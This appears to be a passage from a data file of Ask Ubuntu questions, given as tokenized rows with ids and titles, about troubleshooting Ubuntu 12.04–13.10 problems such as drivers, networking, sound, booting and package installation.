29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > ( eth0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > marking connection 'wired connection 1 ' invalid . oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < warn > activation ( eth0 ) failed . oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > ( eth0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > ( eth0 ) : deactivating device ( reason 'none ' ) [ 0 ] oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > policy set 'vm733532-2g ' ( eth1 ) as default for ipv4 routing and dns . oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > policy set 'vm733532-2g ' ( eth1 ) as default for ipv4 routing and dns . oct 29 21:53:41 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > ( eth0 ) : carrier now off ( device state 30 ) oct 29 21:53:41 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > ( eth0 ) : device state change : disconnected - > unavailable ( reason 'carrier-changed ' ) [ 30 20 40 ] oct 29 21:53:41 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > ( eth0 ) : deactivating device ( reason 'carrier-changed ' ) [ 40 ] oct 29 21:53:41 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > policy set 'vm733532-2g ' ( eth1 ) as default for ipv4 routing and dns . oct 29 21:53:41 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > policy set 'vm733532-2g ' ( eth1 ) as default for ipv4 routing and dns . i ran lsmod module size used by usb_storage 39646 0 nls_utf8 12493 1 udf 84576 1 crc_itu_t 12627 1 udf michael_mic 12540 8 arc4 12473 4 snd_hda_codec_hdmi 31775 1 snd_hda_codec_realtek 174313 1 parport_pc 32114 0 ppdev 12849 0 rfcomm 38139 12 bnep 17830 2 joydev 17393 0 snd_hda_intel 32719 5 snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80916 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51592 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq snd 62218 19 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , sn d_rawmidi , snd_seq , snd_timer , snd_seq_device lib80211_crypt_tkip 17275 0 uvcvideo 67203 0 btusb 17948 2 mac_hid 13077 0 bluetooth 158447 23 rfcomm , bnep , btusb videodev 86588 1 uvcvideo psmouse 86546 0 serio_raw 13027 0 wl 2906597 0 soundcore 14635 1 snd i915 428127 4 snd_page_alloc 14108 2 snd_hda_intel , snd_pcm drm_kms_helper 45466 1 i915 drm 197641 5 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 video 19115 1 i915 mei 36570 0 cfg80211 178877 1 wl lib80211 14040 2 lib80211_crypt_tkip , wl lp 17455 0 parport 40930 3 parport_pc , ppdev , lp usbhid 41937 0 hid 77428 1 usbhid r8169 56396 0
368128	missing shared library for rhythmbox	after i upgraded from 13.04 to 13.10 my rhythmbox would n't work . after many failed attempts i ended up uninstalling and removing all traces of rhythmbox i could find . now i 've reinstalled rhythmbox , and am getting the error rhythmbox : error while loading shared libraries : librhythmbox-core.so.7 : can not open shared object file : no such file or directory i 've tried sudo apt-get install librhythmbox* only to get reading package lists ... done building dependency tree reading state information ... done note , selecting 'librhythmbox-core5 ' for regex 'librhythmbox*' note , selecting 'librhythmbox-core6 ' for regex 'librhythmbox*' note , selecting 'librhythmbox-core7 ' for regex 'librhythmbox*' librhythmbox-core7 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . any ideas on how to get rhythmbox back to a working state ? i 've now reinstalled librhythmboxcore7 using sudo apt-get -- reinstall install librhythmbox-core7 and am getting a different error much closer to my original problem when i first upgraded ( though i do n't think it 's exactly the same ) . ( rhythmbox:22288 ) : gtk-critical ** : gtk_builder_add_from_file : assertion 'filename ! = null ' failed segmentation fault ( core dumped ) and now with fossfreedoms instruction , sudo apt-get -- reinstall install gir1.2-rb-3.0 librhythmbox-core7 rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-zeitgeist rhythmbox-plugins has allowed me to begin using rhythmbox once again .
368133	running out of disc space- how to check where its being used ?	i am starting to run out of disk space . how can i check where all the largest files are located on my ubuntu installation so that i can delete them ?
368135	how to make ubuntu 13.04 faster	after i installed everything i needed , ubuntu became slower and slower . i uninstalled some things and it became little bit faster but still was n't fast . i did a fresh installed of ubuntu 13.04 and formatted 12.10 then installed ubuntu 13.04 since 12.10 was getting slow .
368137	after last update unity no longer works	an hour ago i installed latest updates and now unity does n't work anyomore , i only see desktop with icons . manually searching i opened system monitor and found out only 400 mb of ram is taken which means complete unity is turned off . can someone help me to fix this . since i 'm crippled i probably wo n't be able to provide you with all details you need because i do n't have window borders , no right click menu , nothing , only nautilus .
368140	unable to install konstruktor program	i 've recently switched to linux , having a good knowledge of how it works before switching , since i 've had experience working with ubuntu-based servers for several months . i 've been trying to install a lego cad program that i have found based on an open source library . information on that is here . the program i 'm looking at is called konstruktor , and for the most part it should be working . one dependency however does not seem to be able to install . the missing dependency is `` kdelibs5 '' , which i know what it is and what it 's for , but ca n't get it to install . when trying to install , i get this error : george @ george-pc : ~ $ sudo apt-get install kdelibs5 reading package lists ... done building dependency tree reading state information ... done package kdelibs5 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'kdelibs5 ' has no installation candidate when trying to install the proper package of konstruktor for my system , i get this error : george @ george-pc : ~ $ sudo dpkg -i '/home/george/downloads/konstruktor_0.9-beta1-2_amd64.deb' selecting previously unselected package konstruktor . ( reading database ... 224684 files and directories currently installed . ) unpacking konstruktor ( from ... /konstruktor_0.9-beta1-2_amd64.deb ) ... dpkg : dependency problems prevent configuration of konstruktor : konstruktor depends on kdelibs5 ( > = 4:4.4.5 ) ; however : package kdelibs5 is not installed . dpkg : error processing konstruktor ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for mime-support ... processing triggers for hicolor-icon-theme ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' errors were encountered while processing : konstruktor i have tried updating and adding apt repositories for kde packages , but i continuously get the same error . i tried the package `` kdelibs5-dev '' , which installed fine , but `` kdelibs5 '' wo n't , and konstruktor still wo n't install . i am on ubuntu 13.10 with gnome shell on amd64 architecture . any help would be much appreciated . ( originally posted my issue here ) thanks ahead of time .
368141	my windows 8.1/ubuntu 12.04 dual boot wo n't boot windows after updating to v 8.1	i 've searched the internet for similar problems , but i could n't find an answer . thus , my question is : after upgrading my windows 8 to 8.1 , i am no longer able to boot windows from the grub menu . ubuntu still functions fine . whenever i select the option to boot windows , the screen goes to black .
368143	reinstall ubuntu on custom partitions	i am attempting to reinstall ubuntu 13.04 without losing my installed software and /home docs . i have read countless threads on this same topic , but nothing seems to apply to my situation . when i originally installed , i had created a separate partition for /home , but i am now unsure of which partition that was . based on the picture below , where should i be installing the new copy ? also , will i run into problems since i am now running 13.10 and want to put 13.04 back on it ? should i grab 12.04 or 13.10 for this reinstall ? ( note : i am performing this reinstall due to a complete muck up of my unity/compiz settings and configuration , resulting in no desktop . i 've done my best to resolve this problem first before resorting to this . ) / was on /dev/sda6 during installation /home was on /dev/sda7 during installation swap was on /dev/sda5 during installation fstab file contents uuid=f7ecdb5e-c421-4fbd-856b-78080a3ac57e / ext4 errors=remount-ro 0 1 uuid=f7e8d7c4-6313-4920-b04f-c72dbf745474 /home ext4 defaults 0 2 uuid=369992cf-a663-4d8b-9f55-63ee653b3afe none swap sw 0 0
368145	ctrl + c / ctrl + v do n't work in ubuntu 13.10	i 've installed the package from here to solve the problem of not changing the layout of the keyboard in 13.10 , after that ctrl+c/ ctrl+v is n't working anymore any help please ? ?
368150	root account access	when you install ubuntu it only asked for a user account name and password . how do i switch to the root account within terminal server . i try the su and then enter the only password i created . i have also tried su root and the only password i created and it comes back with authentication failure . i can log in with my user account and use the only password created . what gives ?
368152	why is gdb looking for assembly files ?	i am attempting to learn about gdb using ubuntu 13.10 . i am using the gcc compiler and following example : https : //en.wikipedia.org/wiki/gdb # an_example_session instead of the output shown in the example , i get : program received signal sigsegv , segmentation fault . __strlen_sse2_pminub ( ) at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.s:38 38 ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.s : no such file or directory . why is the debugger looking for what i assume is an assembly source file , that i apparently do n't have installed ?
368153	how do i setup my wireless connection on lubuntu 13.10 ? ( on mac powerbook g4 )	i 'm very new to ubuntu os and have been able to install 13.10 on my power book g4 but am lost on how to just get my wireless connection setup . apparently i need to know how to configure my vpn . which i also do n't know much about . is there a way to set this up so the laptop can detect connections ?
368154	how to install draftsight on ubuntu 13.10 ?	i have ubuntu 13.10 on my laptop . i downloaded draftsight and tried to install it via terminal using this commands i found online : sudo apt-get install ia32-libs libdirectfb-extra libxcb-render-util0 sudo dpkg -- force-all -i ~/downloads/draftsight.deb sudo apt-get -f it said some package is missing and offered to replace it with other packages which i did . i found icon but when i try to run draft this message pops : `` failed to load modules . the application will close.please reinstall the application . '' when i try to uninstall it , it says it ca n't be done because it 's not installed . i 'm not to familiar with ubuntu , i have just started using it . can someone please tell me how to fix this , i need this programme for my lectures and i do n't want to give up using ubuntu .
368156	how to create gpt partitioned bootable usb for uefi ? i am on ubuntu and am trying to get back to windows	basically i am trying to get back to windows so i can play league of legends on this pc . any and all help is appreciated . i am not enjoying playing on ubuntu with playonlinux .
368161	using do-release-upgrade with different arch	is it possible to run do-release-upgrade except upgrading it to 64 bit , instead of the current 32 bit setup ?
368162	i want to install ubuntu 12.04 in my netbook is i right is it applicable i also want to ask what version should i download 32 or 64	intel atom cpu n570 @ 1.66ghz 2.00 gb ram microsoft windows 7 ultimate 32 bit sp1 clevo m1110m i decided to install the ubuntu 12.04.03 rather than windows 7 because they say that ubuntu is mush faster than windows 7 ... .but i have the question it it applicable to install it in my netbook . please answer as soon as posible thank you
368163	how to make nautilus and unity panel respect screen boundaries ?	i 'm having a problem with nautilus and the unity panel indicators . my display looks like this : which makes the viewport a large rectangle one that encompasses both screens . thus , the icons on the desktop gets pushed to the empty space in the top right of the rectangle even though that area is not viewable . also , the unity panel would have a couple of indicators that are not clickable while the other display is active and it is aligned ( ? ) , but are when the top of the screens are set to be flush in the display settings or when the external monitor is unplugged . is there any way to fix these ?
368164	how to start dropbox on startup ?	i am having the exact same issue as in this question but none of the answers worked for me . for instance , trying this answer i get this error : a @ b : ~ $ cd /usr/bin a @ b : /usr/bin $ sudo cp dropbox dropbox1 [ sudo ] password for a : cp : can not stat `dropbox ' : no such file or directory a @ b : /usr/bin $ is there a way to fix this ? reinstalling and selecting `` start dropbox on system startup '' worked as in darent 's answer .
368166	firefox option to restore session on startup is greyed out	firefox 's edit- > preferences- > general- > when firefox starts menu has several options , but the last one , `` show windows and tabs from last time '' is greyed out and unavailable . anyone know why this would be and how to enable it ?
368169	dell inspiron 4050 sound from one speaker	dell inspiron 4050 sound from one speaker i 'm running ubuntu on my laptop , i ran windows opensuse before no problems with sound . then i switched to ubuntu initially things ran smoothly then all of a sudden lost sound from the right speaker after an upgrade . i have tried multiple solutions from removing pulseaudio and using alsa only and a bunch more , gui applications for alsa and tweaked . my sound settings are fine . could anyone please help out . ubuntu 13.04 linux kernel 3.8.0-32 generic
368171	burned 13.10 to dvd but will not start says file missing /	downloaded ubuntu 13.10 to laptop burned it to dvd tried to run along side windows to try it out , but on start up it says windows failed to start and a file is mising on dvd , tried a few times but same thing happens .
368178	dell wireless 1390 issue , no physical connection available	i am running a live disk of kubuntu 13.10 on a dell inspiron 1501 with a 1390 wireless card . i have already activated the sta driver that i have read about on other forums . my only problem now , is it seems i have to download drivers before it will work the ethernet port on my laptop is damaged and the only ethernet to usb cable i have is not working for any of my computers is there any way i can download the needed drivers onto a thumb drive or cd ? or do i need a connection ?
368180	how to install crusader kings 2 ?	i 'm trying to install a 'launcher ' for the game crusader kings 2 , so that i can get the dlc i bought for it to work . why is it that whenever i try and lookup directions on how to do something with the terminal , it is always incomprehensible gibberish to me ? i 've been using ubuntu 12.04 for over a year now , and i 've tried to avoid ever having to do anything with terminal , because i might as well be dealing with egyptian heiroglyphs . http : //software.opensuse.org/download.html ? project=home : sxxxx & package=qtck2launcher how do i install this . please be very clear , the terminology typically thrown around on help pages usually stumps me . i tried just copying and pasting the code on that page , but it says permission denied . how exactly do i 'run ' said code as 'root ' .
368181	why 12.04.2 to 12.04.3 did n't upgrade kernel ( 3.5- > 3.8 ) and/or xorg	i have ubuntu 12.04.3 installed and the kernel is still 3.5 i managed to install 3.8 installing it with source-kernel-lts-raring but i wonder why it did n't install automatically from update-manager .
368189	retrieve statistics on ubuntu packages	how can i retrieve a list of all packages or better specific packages offered by ubuntu ? preferable , i would like to create a list of certain packages shipped by ubuntu but on a computer in the cloud ( e.g . no ubuntu installed ) . does anyone have an idea how such thing could be build ? thanks in advance .
368194	ubuntu is n't booting off of my external hdd	i followed a tutorial on youtube for installing ubuntu 13.04 on an external hdd . after completion of the installation onto the external hdd , i attempted booting into ubuntu . unfortunately , all i see is nothing but a blank , black screen . i decided to give it a bit of time , yet no results . i 've given it 15 minutes , and still , no change . the screen remains black and blank . anyone have any ideas about what this issue may be ? if so , can i get a few pointers , or suggestions on how to resolve such an issue ?
368196	define sources to dash search	is it possible to set the same sources to all dash searches ? for example when i type something in dash i would like to limit the sources to : askubuntu , stackexchange , github and sciencedirect . i 'm using ubuntu 13.10 .
368200	multi internet connection	i have 2 lan cards , both has wired internet connections and both connections are with static ip.. i want to run a smalll application on ubuntu and want to access remotely so i have connected 2 connections i want to make them both work together , if they both merge like 1mbps with 1mbps thats more cool but if it does not merge at least i want to make settings like if connection one lost due to unplug or limited connection 2 establish automatically because i have 2 static ips if one wont work i will try to access from another ip is it possible please tell me how ?
368201	internet not connecting	i am running 12.04 on a lenovo thinkpad and it 's not connecting to the wpa/wep network i have at home . i have connected to this same network before , but not in the last 2 days . my iphone connects to the network ( and is how i am posting this ) . i am able to connect to a leap network at my work and i see the network here at home , i just can not connect , which confuses me since it seems the wireless card is not the issue . what can i try to get myself back on ?
368205	choosing proper release of unbuntu to install	before the latest release , i read that a beginner like myself should start by using old releases . now read that this latest is more user friendly . should i get it and jump in ?
368206	headset does n't work at all in 13.10	so i fresh installed 13.10 and it seems fine enough as far as the lastest ubuntu goes , except my headset does n't work ( it plugs into headphone and mircophone ) . while on my machine the microphone portion never worked regardless of os the headphones part does . in 13.10 however , nothing works . i tried disabling automute , looked for `` switching automute to line out '' as mentioned in another question ( f6 for me is where you select a sound card , but line out does n't exist for me just default , hda intel , and enter device name ... ) . i have no idea at this point how to get it working . ( sighs always something with a release ) . @ cl here ya go ( was n't sure how to put it in comments properly especially sense it exceeds char limit . also note headphones are plugged in at read out . simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined playback channels : mono limits : playback 0 - 127 mono : playback 111 [ 87 % ] [ -12.00db ] [ on ] simple mixer control 'headphone',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 127 mono : front left : playback 127 [ 100 % ] [ 0.00db ] [ on ] front right : playback 127 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'headphone mic boost',0 capabilities : volume playback channels : front left - front right capture channels : front left - front right limits : 0 - 4 front left : 4 [ 100 % ] [ 40.00db ] front right : 4 [ 100 % ] [ 40.00db ] simple mixer control 'speaker',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 127 mono : front left : playback 0 [ 0 % ] [ -95.25db ] [ off ] front right : playback 0 [ 0 % ] [ -95.25db ] [ off ] simple mixer control 'pcm',0 capabilities : pvolume playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 255 [ 100 % ] [ 0.00db ] front right : playback 255 [ 100 % ] [ 0.00db ] simple mixer control 'beep',0 capabilities : pvolume pvolume-joined playback channels : mono limits : playback 0 - 3 mono : playback 0 [ 0 % ] [ -18.00db ] simple mixer control 'capture',0 capabilities : cvolume cswitch capture channels : front left - front right limits : capture 0 - 15 front left : capture 7 [ 47 % ] [ 10.50db ] [ on ] front right : capture 7 [ 47 % ] [ 10.50db ] [ on ] simple mixer control 'auto-mute mode',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'disabled'
368207	change /home and other relevant locations	on my laptop , i have windows 8 installed ( on the internal solid state drive ) . i have another external hard drive with an installation of ubuntu ( with the efi , / , /home , and swap partitions located on it ) . all of my data is located on my internal drive , because i do n't bring my hard drive around with me everywhere . thus , my /home folder ( and all sub folders ) do n't really contain anything . this is n't very major , but more of an inconvenience . to access any of my data , i have to manually select my internal drive , and go through a plethora of other folders . for example , most of my important data is located at /media/d0bc1650bc163208/users/my_user_name/skydrive . of course , i can create symbolic links to get everywhere i want to , but it would be nice if i could simply change the /home folder ( to my_user_name ) , my documents folder , etc . of course , i know i would have to make sure the internal drive always gets mounted first . is there a simple way to do this ? i think this might be the easiest way , but i 'm not sure .
368210	installing pagekite/owncloud remote access on ubuntu server 12.04	does anyone know the commands to install pagekite on ubuntu server 12.04 . i already have the ssh and lamp dependencies installed . i am trying to access my owncloud server from anywhere . if anyone has any way of making it so i can access the owncloud browser from anywhere please let me know . @ pieter .
368212	how do i find ubuntu drivers for my gigabyte ga-z77-d3h motherboard ?	i am going to build a computer and just ordered my parts . here are my parts ... http : //pcpartpicker.com/user/jdabi13/saved/2aba gigabyte , ( the brand of my motherboard ) says to find linux drivers from the chipset manufacturer , i can not find the drivers on intel 's site ( i have a z77 chipset from intel ) . do i need to find drivers at all or do they come in the ubuntu kernel when i install it ? i also have a gigabyte brand graphics card made by nvidia , where do i find those drivers ? thanks if you can help
368214	where can i find unity 7.1.2 's appearence/gui files on my drive ?	where are all the different files for unity located that pertain directly to unity 's appearance ? where if i edited this file , saved , logged out and back in ( or refreshed , ) i 'd see a visible difference in unity . i want to change certain things . i 've searched the drive and i 'm not coming up with much . should i be asking this on a unity forum ? or is this the right place ? in general where would you find an app 's files once installed from software center . as in windows7 when you go to `` program files ''
368221	is the ubuntu phone filesystem mountable via a usb connection ?	is the ubuntu phone filesystem mountable in linux via a usb connection ? is there reason to believe this feature is here to stay ? for me rather than full desktop/phone convergence , i 'd be happy with being able to use my phone as the place i store all my essential data ( as in a usb stick ) and then use it on my phone or share it with my laptop whenever i need to .
368225	network-manager is n't working	there is some problems with it . most of time network-manager works properly but somethimes i see some troubles with it : disconnection of internet ( but connection with wifi is active and normal ) .only rebooting of system helps for me in this case . somethimes it disconnects the wifi connection suddenly and won't connect again.only rebooting of system helps for me in this case . it askas password for wifi ( password is added in ) again and again.only rebooting of system helps for me in this case . i 've tried sudo service network-manager restart but it do n't helps . sorry for bad english .
368226	google music ( play ) and chrome	i did a fresh install of ubuntu 13.10 and it 's taken me forever and a day to get the surround sound working on my system using the creative labs audigy se card . now that i have the sound working correctly , i 'm having an issue with streaming my music from google play , using chrome and firefox . firefox wo n't stream it at all . and with chrome , the music is like a 33rpm record on 45rpm speed . it 's very very choppy , static , sounds like the chipmunks took a bottle of speed . anyone else stream music from google play ? i can stream my movies via the plex media server perfectly fine . all speakers come through . but i stream my music when i 'm working . right now i ca n't do that . i do n't want to have to try 200 fixes as the last time i ended up re-installing and working on a few just to get my sound to work . i do n't want to loose it again .
368227	synaptics touchpad goes back to default values on startup	i am having problems with synaptics touchpad as in this question . this command works xinput -- set-prop 12 `` synaptics finger '' 55 70 255 but on startup it is all reset to default values . i tried sudo sed -i 's : ^exit 0 : sleep 6 \ & \ & xinput -- set-prop `` etps/2 elantech touchpad '' `` synaptics finger '' 55 70 255\n & : ' /etc/rc.local for various values of sleep for as much sleep 6 but so far nothing worked . is there a way to fix the values so that they stick ?
368232	parsing error when bootstrapping on windows	i am trying to get juju working on windows 8 but i am running in to some errors when trying to get juju to see my ssh keys : c : \users\username > juju bootstrap error : error parsing environment `` azure '' : read c : \users\user\skydrive\documents\azure\ssh\ : the handle is invalid . i 've added a public key i generated with putty to the directory above called azure my environments.yaml file has this in it : authorized-keys-path : c : \users\user\skydrive\documents\azure\ssh\ any ideas ?
368236	bluetooth mouse lags and eventually disconnects	i just installed ubuntu 13.10 . i have a bluetooth mouse ( adesso imouse s100 ) . initially , the mouse works fine , but after a few minutes , it starts to lag a lot and it eventually disconnects . and then , it takes forever to reconnect . the mouse works fine on my win-7 issue ( dual boot win-7/ubuntu ) . so i know it 's not an hardware issue anyone has an idea ?
368237	how backwards compatible will the ubuntu sdk be ?	first let me say , by sdk i 'm not actually referring to qt creator , but ubuntu 's qml libraries , i 'm actually using geany for all my programming . when ubuntu very first released the ubuntu sdk i switched an app i was working on to qml , i 'm using qml for the gui and c for all the inner workings . after upgrading to 13.10 my app pretty much broke , it was n't difficult for me to figure out what had changed with the ubuntu sdk and make the appropriate changes , but now i am concerned about the sdk in general , did they only make such dramatic changes because their still working it out , or is every version of ubuntu that comes out going to break compatibility with apps ? in other words , once they get the ubuntu sdk officially released is it going to be the same regardless what ubuntu version people have ? and is there any word on when the final version of the ubuntu sdk will be released ?
368240	qt creator and ubuntusdk	please , help me ! i 'm install ubuntu sdk with qt creator , how it was wrote here click but when i launch qt creator there are n't ubuntu 's projects ( projects > ubuntu > simple touch ui ) ... only default console projects ... how can i add these solutions in qt creator ? to qt creator found ubuntu sdk p.s . : sorry , for my english
368241	poor battery on hp probook 4540s on ubuntu ! help pls	hi i just bought a new hp probook 4540s , i have ubuntu 13.10 and windows 7 on 64 bit installed . the batery on windows last abaout 4h30m and in ubuntu only 1h20m this is not normal ! can enybody help me resolve this problem ? thank you .
368242	wacom graphics tablet cth-480 / ctl-480 not detected in ubuntu 13.10	my wacom tablet ( cth-480 ) is not detected by the wacom tablet option under settings . the tablet shows up when i run lsusb but does not show up under settings . again thanks .
368244	how to upgrade ubuntu server	i want to upgrade my ubuntu server 64bit 11.04 to ubuntu 12.04 . i tried to do it with the command : $ do-release-upgrade but the output is : checking for a new ubuntu release no new release found does anybody know what the reason might be ?
368249	can`t reboot sometimes ( ubuntu 13.10 , amd driver 13.10 )	when i shut down my notebook ( asus u38dt ) - after ubuntu logo the notebook freezes with black screen , power is still on and no reaction on any button ( even no result with reisub ) . the only way is to press ( 2-3 seconds ) power button . please help !
368255	unity dashboard wo n't find local files , rearrange icons on two computers	i ca n't move icons around my unity launcher anymore and the dash wo n't search my local files and folders . was working when i first installed 13.10 , but now it wo n't search for local files , and it wo n't let me rearrange the icons in any way . i 've tried turning on and off all the scopes ( lenses ? ) in multiple combinations , but the scopes wo n't find any files for me . i ca n't see my recently used files , or files and folders scope at all . any changes i make to the scopes wo n't take . i tried dragging and dropping the icons on the side dock , but that does n't work . the icons only stick to my mouse until i put them back where they were . i can not unlock any icons from the launcher , it just does n't do anything when i click it . i tried rebooting both of my computers and its still wo n't function normally . i used ubuntu-bug -w to report a bug , no one has gotten back to me . is there some option that i am over looking ? please help , this is so annoying , alex
368258	how to install ubuntu on a ibm r31 thinkpad	i recently acquired an old ibm r31 thinkpad , and i 'd figure i 'd install lubuntu on it . i 've followed the quick steps for usb installation on the help wiki page , but i ca n't seem to get it to boot from my formatted flash drive . i 've checked the boot priority on the bios page , but the option to boot from usb does n't even seem to be there . the only bootable options are legacy and usb floppy drives . the cd drive is shot , so i ca n't install from there either . do i have any other options for installation without having to pay for a floppy drive or a replacement cd drive ? the wiki pages mentions something about installation from within windows . would it be possible to remove windows using this option , or would it just create a partition ?
368264	ubuntu 12.04 with windows 8 dual boot not booting	i followed the procedure mentioned at installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) on toshiba satellite laptop . also tried the boot-repair and logs @ http : //paste.ubuntu.com/6327398/ its not booting to windows as well as ubuntu . it goes to grub command prompt . when on initial screen it briefly shows error message as failed to open /efi/microsoft/boot/grubx64 . please advise . edit : secure boot in on and boot mode is uefi boot
368268	is it possible to show some kind of image when opening gnome-terminal ?	is there any possible way to show splash screen of random pictures ( .jpeg or .png ) when opening gnome-terminal everytime ?
368269	how do i get a qualcomm atheros killer e2200 gigabit ethernet card working on a msi z87-gd65 ?	so i literally just built my first computer from scratch and i ca n't get the network card to work as i 've gathered it requires getting some drivers somehow.. motherboard : msi z87-gd65 cpu : intel haswell i7 ubuntu ver : 12.04 using the on-board network port please help i 'm about to start crying into my keyboard over this ( not really ) . any info would be greatly appreciated , also please be very specific as to what i have to do as i have not used ubuntu very much so talk to me like a child , i wo n't take offence . also i 've already tried following the instructions here : how do i get a qualcomm atheros killer e2200 gigabit ethernet card working ? i do n't know if i 'm just retarded or am missing something
368270	how to i make cisco webex work with 13.10 64bit ?	i 'm having a very hard time getting webex to work under saucy . up until now i 've been able to just install a java plugin , install ia32-libs , and i was good to go . with saucy ia32-libs is gone and it 's up to us to figure out which 32-bit libraries we need to install . so the question is , how do i install webex on 64bit saucy without ia32-libs ?
368275	backup network for overheating usb wifi stick	my usb wifi adapter tends to overheat and when it happens , it stops working until i pull it out and plug it in again . since i often access my machine remotely from other places , when it happens , my machine gets inaccessible for me until i get home to fix it . i 'm thinking , i have another usb wi-fi adapter in spare . my question is : would it be possible to plug both in , but tell ubuntu to only use the secondary one when the primary wifi adapter becomes off-line ? ( i wo n't use the other wi-fi adapter as primary because it provides significantly less quality . ) i 'm currently looking for a short-term workaround and will buy better hardware later .
368276	copy files to nexus 4 on kubuntu ( 13.04 )	i know , this has been asked a few times already but i 'm still having troubles to get files copied my new nexus 4 phone mounted on my kubuntu 13.04 machine . i followed the guide at : http : //www.pocketables.com/2013/03/how-to-mount-the-lg-nexus-4-as-a-usb-drive-in-linux.html i would only get : $ cp -r /mnt/media/albums/a\ perfect\ circle\ -\ thirteenth\ step/ . cp : accessing â.â : transport endpoint is not connected reg @ regdesktophome : /media/nexus4/internal storage/music $ ls -l but thereafter , mount still shows it mounted : mtpfs on /media/nexus4 type fuse.mtpfs ( rw , nosuid , nodev , allow_other ) what 's going on here ? thanks for the assistance ! edit when i tried to fsck it , i got this : $ sudo fsck /media/nexus4 fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) fsck.ext2 : is a directory while trying to open /media/nexus4 the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > $ and copying a direcory with cp -r would actually only copy the directory but no contents and then afterwards i would try to do a copy of the contents , it would look like : reg @ regdesktophome : /media/nexus4/internal storage/music/a perfect circle - thirteenth step $ cp /mnt/media/albums/a\ perfect\ circle\ -\ thirteenth\ step/* . reg @ regdesktophome : /media/nexus4/internal storage/music/a perfect circle - thirteenth step $ ls -l total 0 reg @ regdesktophome : /media/nexus4/internal storage/music/a perfect circle - thirteenth step $ what 's up with this ? thanks !
368277	problems with ac3d , missing libxmu.so.6	i am running ubuntu 13.10 ( 64bit ) , and am trying to run ac3d . when i try to run ac3d ( from cli ) i receive the error that i am missing libxmu_.so.6 . where is it , or where can i get it ?
368279	`` your profile could not be opened correctly . '' while opening chrome/ium	the error reads : your profile could not be opened correctly . some features may be unavailable . please check that the profile exists and you have permission to read and write its contents . i have checked for a fix but they involve resetting chromium and losing all my bookmarks . i believe it is a sync problem . maybe there is a way to fix it ? regards , dl
368284	what 's the common component for picking color in both agave and gcolor2 ?	what 's the common component for picking color in both agave and gcolor2 ?
368285	tail output of program	how do you use tail to get the last line outputted by a program . i 've tried the following so far : echo `cmd` > > stdin & & tail -1 stdin for instance : henry @ henry-pc : ~ $ echo `` abc\n123 '' > > stdin & & tail -1 stdin abc\n123
368286	problem with connect to server using ftp ( with login )	i am unable connect to my remote account using ubuntu 's `` connect to server '' option after moving on to ubuntu 12.04 lts . in ubuntu 10.10 i used to connect to my ftp server by going to places- > connect to server- > ftp ( with login ) after giving the userid and password the remote folder would mount immediately but now it is showing a busy icon at top until i close the window after some time . i have also tried to connect using ctrl + l from a nautilus window using sftp : //user @ server but result is the same . even though i could connect to my ftp server using gftp , the default one from nautilus is a better option to me .
368289	installing traditional chinese language to support adobe reader	whenever i try to open pdf forms in adobe reader ( version 9.5.5 ) , it prompts a dialog box saying that i need to install traditional chinese font to view the contents . i these fonts installed in my system through language support but problem still persists . please guide me . thanks in advance
